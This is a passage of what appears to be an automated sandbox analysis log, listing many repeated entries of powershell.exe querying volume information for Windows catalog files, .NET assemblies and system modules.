          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
